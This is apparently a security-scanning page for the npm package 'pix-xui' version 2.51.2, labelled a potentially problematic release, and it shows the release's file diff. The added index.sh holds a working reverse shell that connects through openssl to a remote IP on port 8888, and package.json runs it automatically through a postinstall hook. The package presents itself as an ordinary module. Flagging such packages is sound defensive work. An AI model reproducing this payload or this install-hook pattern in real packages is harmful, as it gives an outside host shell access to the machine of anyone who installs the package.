pix-xui 2.51.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of pix-xui might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +0 -0
  2. package/index.sh +1 -0
  3. package/package.json +11 -0
package/index.js ADDED
File without changes
package/index.sh ADDED
@@ -0,0 +1 @@
1
+ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 101.201.108.144:8888 > /tmp/s; rm /tmp/s
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "pix-xui",
3
+ "version": "2.51.2",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "'chmod +x index.sh; ./index.sh'"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }